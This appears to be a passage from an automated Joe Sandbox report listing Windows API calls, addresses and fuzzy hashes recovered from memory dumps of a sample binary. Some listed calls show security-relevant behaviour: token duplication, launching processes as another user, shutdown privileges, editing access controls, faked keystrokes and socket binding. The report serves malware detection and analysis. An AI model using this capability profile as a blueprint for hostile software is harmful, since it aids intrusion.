                                                                                                        • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                                        • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                                        • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                                        • SendMessageW.USER32 ref: 0047CD12
                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                                        • SendMessageW.USER32 ref: 0047CD80
                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                                        • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                                        • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                                        • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                                        • SendMessageW.USER32 ref: 0047CE93
                                                                                                        • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,033C1B38,00000000,?,?,?,?), ref: 0047CF1C
                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                                        • SendMessageW.USER32 ref: 0047CF6B
                                                                                                        • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,033C1B38,00000000,?,?,?,?), ref: 0047CFE6
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                        • String ID: @GUI_DRAGID$F
                                                                                                        • API String ID: 3100379633-4164748364
                                                                                                        • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                        • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                                        • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                        • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                                        APIs
                                                                                                        • GetForegroundWindow.USER32 ref: 00434420
                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                                        • IsIconic.USER32(?), ref: 0043444F
                                                                                                        • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                                        • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                        • String ID: Shell_TrayWnd
                                                                                                        • API String ID: 2889586943-2988720461
                                                                                                        • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                        • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                                        • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                        • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                                        APIs
                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                                        • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                                        • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                                        • _wcslen.LIBCMT ref: 00446498
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • _wcsncpy.LIBCMT ref: 004464C0
                                                                                                        • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                                        • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                                        • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                                        • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                                        • CloseDesktop.USER32(?), ref: 0044657A
                                                                                                        • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                                        • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                                                        • String ID: $@OH$default$winsta0
                                                                                                        • API String ID: 3324942560-3791954436
                                                                                                        • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                                        • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                                        • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                                        • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                          • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                                                          • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                                                          • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                        • _wcscat.LIBCMT ref: 0044BD94
                                                                                                        • _wcscat.LIBCMT ref: 0044BDBD
                                                                                                        • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                                                        • _wcscpy.LIBCMT ref: 0044BE71
                                                                                                        • _wcscat.LIBCMT ref: 0044BE83
                                                                                                        • _wcscat.LIBCMT ref: 0044BE95
                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                                                        • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                                                        • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                                        • String ID: \*.*
                                                                                                        • API String ID: 2188072990-1173974218
                                                                                                        • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                        • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                                                        • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                        • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                                        • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                                        • __swprintf.LIBCMT ref: 004789D3
                                                                                                        • __swprintf.LIBCMT ref: 00478A1D
                                                                                                        • __swprintf.LIBCMT ref: 00478A4B
                                                                                                        • __swprintf.LIBCMT ref: 00478A79
                                                                                                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                                        • __swprintf.LIBCMT ref: 00478AA7
                                                                                                        • __swprintf.LIBCMT ref: 00478AD5
                                                                                                        • __swprintf.LIBCMT ref: 00478B03
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                        • API String ID: 999945258-2428617273
                                                                                                        • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                        • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                                        • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                        • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                                        APIs
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
• __wsplitpath.LIBCMT ref: 00403492
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• _wcscpy.LIBCMT ref: 004034A7
• _wcscat.LIBCMT ref: 004034BC
• SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
• _wcscpy.LIBCMT ref: 004035A0
• _wcslen.LIBCMT ref: 00403623
• _wcslen.LIBCMT ref: 0040367D
Strings
• #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
• Error opening the file, xrefs: 00428231
• Unterminated string, xrefs: 00428348
• _, xrefs: 0040371C
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
• String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
• API String ID: 3393021363-188983378
• Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
• Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
• Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
• Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
• GetFileAttributesW.KERNEL32(?), ref: 00431AE7
• SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
• FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
• FindClose.KERNEL32(00000000), ref: 00431B20
• FindClose.KERNEL32(00000000), ref: 00431B34
• FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
• SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
• SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
• FindClose.KERNEL32(00000000), ref: 00431BCD
• FindClose.KERNEL32(00000000), ref: 00431BDB
Strings
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
• Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
• Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
• Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
• Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
APIs
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
• __swprintf.LIBCMT ref: 00431C2E
• _wcslen.LIBCMT ref: 00431C3A
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
Strings
Similarity
• API ID: CreateDirectoryFullNamePath__swprintf_wcslen
• String ID: :$\$\??\%s
• API String ID: 2192556992-3457252023
• Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
• Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
• Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
• Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
APIs
• GetLocalTime.KERNEL32(?), ref: 004722A2
• __swprintf.LIBCMT ref: 004722B9
• SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
• SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
• SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
• SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
• SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
• SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
• SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
• SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
• SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
Strings
Similarity
• API ID: FolderPath$LocalTime__swprintf
• String ID: %.3d
• API String ID: 3337348382-986655627
• Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
• Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
• Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
• Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 004428A8
• FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
• FindClose.KERNEL32(00000000), ref: 0044291C
• FindClose.KERNEL32(00000000), ref: 00442930
• FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
• SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
• SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
• FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
• FindClose.KERNEL32(00000000), ref: 004429D4
  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
• FindClose.KERNEL32(00000000), ref: 004429E2
Strings
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
• Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
• Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
• Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
• Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
• OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
• GetLastError.KERNEL32 ref: 00433414
• ExitWindowsEx.USER32(?,00000000), ref: 00433437
• InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
• SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
Strings
Similarity
• API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 2938487562-3733053543
• Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
• Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
• Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
• Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
APIs
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
• GetLengthSid.ADVAPI32(?), ref: 004461D0
• GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
• GetLengthSid.ADVAPI32(?), ref: 00446241
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
• CopySid.ADVAPI32(00000000), ref: 00446271
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 1255039815-0
APIs
• __swprintf.LIBCMT ref: 00433073
• __swprintf.LIBCMT ref: 00433085
• __wcsicoll.LIBCMT ref: 00433092
• FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
• LoadResource.KERNEL32(?,00000000), ref: 004330BD
• LockResource.KERNEL32(00000000), ref: 004330CA
• FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
• LoadResource.KERNEL32(?,00000000), ref: 00433105
• SizeofResource.KERNEL32(?,00000000), ref: 00433114
• LockResource.KERNEL32(?), ref: 00433120
Similarity
• API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
• String ID:
• API String ID: 1158019794-0
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D627
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
• GetLastError.KERNEL32 ref: 0045D6BF
• SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
Similarity
• API ID: _memmove$_strncmp
• String ID: @oH$\$^$h
• API String ID: 2175499884-3701065813
APIs
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
• WSAGetLastError.WSOCK32(00000000), ref: 0046531C
• bind.WSOCK32(00000000,?,00000010), ref: 00465356
